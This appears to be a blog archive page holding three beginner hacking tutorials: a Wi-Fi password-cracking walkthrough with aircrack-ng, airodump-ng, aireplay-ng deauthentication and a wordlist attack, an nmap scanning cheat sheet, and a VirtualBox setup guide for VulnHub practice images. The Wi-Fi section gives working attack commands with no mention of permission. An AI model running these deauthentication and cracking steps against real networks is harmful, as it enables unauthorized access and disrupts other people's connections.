Archives September 2020

One of the most popular exploits for new hackers to try is cracking Wi-Fi access points. Before someone can even consider attacking a Wi-Fi AP, they need the MAC address of the target AP (also know as the BSSID), the MAC address of the client, and the channel the AP is operating on. All this information and more can be found using the tools in the aircrack-ng suite. This suite of tools is included by default in every version of Kali, so if you’ve got you real hacker hat on you don’t need to apt-get anything.

The first step to get started is to put your wireless network card into monitor mode. This mode allows your card to see all the traffic around it similarly to promiscuous mode for wired network cards. The aircrack way of doing this is as follows:

root@kali: ~# airmon-ng start wlan0

wlan0 in this case is the default wireless network interface if the command runs into trouble make sure that wlan0 is in fact there using the ifconfig command. Once your wireless card is in monitor mode airmon-ng will rename the interface something like “wlan0mon” take note of this rename it will be important later.

Now that we are listening to all the packets flying by our heads its time to start doing something with them and that is where airodump-ng command comes into play. Airodump-ng captures and displays the key data from all the broadcasting APs as well as the clients connected to those APs. The command to do this is as follows:

root@kali: ~# airodump-ng wlan0mon

Airodump-ng will split the output screen into an upper and lower portion. The upper portion has information on the broadcasting APs including:

1. BSSID: MAC address of the AP or client
2. PWR: power of the AP (the strength of the signal)
3. Beacons:how many beacon frames have been detected
4. #Data: data throughput rate
5. #/s: how many packets have traversed the wireless card
6. CH: channel (1-14)
7. MB: theoretical throughput limit
8. ENC: encryption protocol
9. CIPHER: cipher used for encryption
10. AUTH: authentication type
11. ESSID: (also know as the SSID)

Now that all the information needed to crack the AP lets get to the crack itself. To crack the Wi-Fi password you can open three terminals or tabs in the same terminal. In the first you would enter commands similar to the following:

root@kali: ~# airodump-ng -c 10 --bssid 01:02:AA:BB:CC:22 -w <capture_output> wlan0mon

That command captures all the packets traversing the AP on channel 10 (-c 10) to the location of your output file (-w <file_name>). In the second terminal we are going to use aireplay-ng to deauthenticate anyone connected to the AP. This will force them to reauthenticate with the AP. The reason for this we are going to be capturing the authentication hash that gets passed in the four-way handshake. This speeds up the creaking process as you would need a large amount of random packets captured otherwise. The command to do this is as follows:

root@kali: ~# aireplay-ng --deauth 100 -a 01:02:AA:BB:CC:22 -c AO:A2:E1:33:7C:E5 wlan0mon

And in the last terminal, we can use a password list to find the password in the captured hash file (this will be the output in .cap format). This command will do just that:

root@kali: ~# aircrack-ng -w wordlist.dic -b 01:02:AA:BB:CC:22 capture_output.cap

If you’ve spent five minutes looking around at anything related to hacking networks you’ve undoubtedly run across the tool NMAP. And if you’ve just followed what ever example you saw it used in you are missing out on one of the most powerful hacking tools out there. Lets start from the beginning about nmap it was developed by Gordon Lyon also know as fyodor in 1997. It was created for fun and in the hopes that people would find it useful. And fyodor if you’re reading this it really is. This tool comes by default on kali machines but if you are using an OS that doesn’t have it already installed I’ll go over installation right now.

Installing Nmap

Linux RPM Source and Binaries

Simple commands for downloading nmap to RPM Source Linux check out the following commands. If these don’t work for you check out the more detailed guide on the nmap site here

rpm -vhU https://nmap.org/dist/nmap-7.80-1.x86_64.rpm
rpm -vhU https://nmap.org/dist/zenmap-7.80-1.noarch.rpm
rpm -vhU https://nmap.org/dist/ncat-7.80-1.x86_64.rpm
rpm -vhU https://nmap.org/dist/nping-0.7.80-1.x86_64.rpm

Mac OS X Binaries

You can get a stable release installer for Mac OS here

Scanning for targets

Before you can start looking at open ports and what services reside there we have to see what hosts are up to begin with.

Scan single IP	root@kali:~# nmap 127.0.0.1
Scan via domain name	root@kali:~# nmap www.target.com
Scan range of IPs	root@kali:~# nmap 127.0.0.1-24
Scan a full subnet	root@kali:~# nmap 127.0.0.1/24
Scan based on IP text file	root@kali:~# nmap -iL iplist.txt
Exclude host from Scan	root@kali:~# nmap --exclude 127.0.0.1
Exclude list from Scan	root@kali:~# nmap --excludefile ips.txt

OS and Service Detection

Now that we can see what host is up we should take a look at what Nmap can do in helping us determine the operating system and services on those hosts.

Detect OS and Services	root@kali:~# nmap -A 127.0.0.1
Standard Service Detection	root@kali:~# nmap -sV 192.0.0.1
Aggressive Detection	root@kali:~# nmap -sV --version-intensity 5 127.0.0.1
Banner Grabbing	root@kali:~# nmap -sV --version-intensity 0 127.0.0.1

Scanning for ports

While nmap has added a dizzying amount of functions and features port scanning is the core of what it does. Nmap recognizes six states when it comes to ports open, closed, filtered, unfiltered, open|filtered, and closed|filtered.

Scan Single Port (port 80)	root@kali:~# nmap -p 80 127.0.0.1
Scan a range of ports	root@kali:~# nmap -p 22-80 127.0.0.1
Scan top 100 most common ports	root@kali:~# nmap -f 127.0.0.1
Scan all the ports	root@kali:~# nmap -p"*" 127.0.0.1
Scan results for open ports only	root@kali:~# nmap --open 127.0.0.1

Port Scanning Techniques

With Nmap you can set the type of scan you would like to do when you set off on a scan hunt. Depending on the type of scanning you do most often you will use one of the following on an almost every scan bases. But even if that is the case it never hurts to know what the other techniques for scanning are out there.

TCP SYN scan (default)	root@kali:~# nmap -sS 127.0.0.1
TCP connect scan	root@kali:~# nmap -sT 127.0.0.1
UDP scan	root@kali:~# nmap -sU 127.0.0.1
SCTP INIT scan	root@kali:~# nmap -sY 127.0.0.1
TCP ACK scan	root@kali:~# nmap -sA 127.0.0.1
TCP Window scan	root@kali:~# nmap -sW 127.0.0.1

Outputting Formats

Lets finish this off with how you can store what nmap give you from these scans. Yes you could always pipe the standard out to a file but before you do that but check out what nmap can do right out of the box.

Default output to file	root@kali:~# nmap -oN file.txt 127.0.0.1
Output to XML	root@kali:~# nmap -oX file.xml 127.0.0.1
Output for grep friendly file	root@kali:~# nmap -oG file.txt 127.0.0.1
Output in all formats	root@kali:~# nmap -oA file 127.0.0.1

Conclusion

Nmap has far more to it then just what is listed here. Full books have been written on the subject including this one from the creator himself Nmap Network Scanning these will get you started in taking your nmap skills beyond simply running this command examples that are found on stackoverflow.

TLDR;

Wikipedia defines Virtual Machines as: In computing, a virtual machine (VM) is an emulation of a computer system. Virtual machines are based on computer architectures and provide functionality of a physical computer. Their implementations may involve specialized hardware, software, or a combination. This post will be a Hello World for getting up and running with them.

• Virtual Machines Explained
• Images Explained
• VMs and Linux
• VMs and Mac
• VMs and Windows

Virtual Machines Explained

A Virtual Machine, also referred to as VM, is simply a system known as the Guest running inside another system known as the Host with software holding the boundaries between the two. The system running inside the Virtual Machines is based on something called an Image and I’ll cover what that is in the next section. Virtual Machines are useful for a number of reasons from protecting your system from potentially harmful software to keeping a backup of a system ready for deployment at anytime. But for the purposes of this post and most of the site I’ll be using VMs for loading images to test hacking skills against.

What is an Image

The image is the everything when it comes to VMs. It holds the OS, applications, preexisting files, and anything else a normal system could have. Think of an image as a snapshot of a system. This could be used for handing out identical systems to multiple people and is a great way to learn since differences in configurations aren’t a factor. While you can make your own images that will be out of the scope of this post. But luckily you can pick up tons of images from VulnHub. For this post I’m going to get the Mr. Robot Image for no other reason then I’m a fan of the show. So go ahead pick one that you like or you can just follow the link I put for the Mr. Robot image. Then simply download the ova (this is the file type VMs use) and check that the hash matchs.

Virtual Machines for Linux

For linux we are going to go with virtual box as our VM software of choice. You can find the download link here. This is the hardest of installs for virtual box as the number of linux distros is pretty high. The following are the basics if you don’t see your flavor of linux here and/or the steps aren’t working for you please check out the download page of virtual box for more details.

Oracle Linux

Users of Oracle Linux 6 and 7 can use the Oracle Linux yum

yum install VirtualBox-6.1

Debian-based Linux distributions

Add the following line to your /etc/apt/sources.list. According to your distribution, replace ‘<mydist>’ with ‘eoan’, ‘bionic’, ‘xenial’, ‘buster’, ‘stretch’, or ‘jessie’ (older versions of VirtualBox supported different distributions):

deb [arch=amd64] https://download.virtualbox.org/virtualbox/debian <mydist> contrib

Then to download:

sudo apt-get update
sudo apt-get install virtualbox-6.1

Once you’ve installed virtualbox just run it and its as simple as clicking the import selecting the image file you’ve downloaded

Virtual Machine for Windows

Once again going with virtualbox for this instance the process is more straight forward then with linux installation. Just download the exe file format from here go threw your normal next next finish clicking and once you’ve finished the installation you’re ready for importing the ova to get started.

Virtual Machine for Mac

If you’ve made it this far in the post what I’m going to say next is obvious. Download virtualbox for Mac on the download page.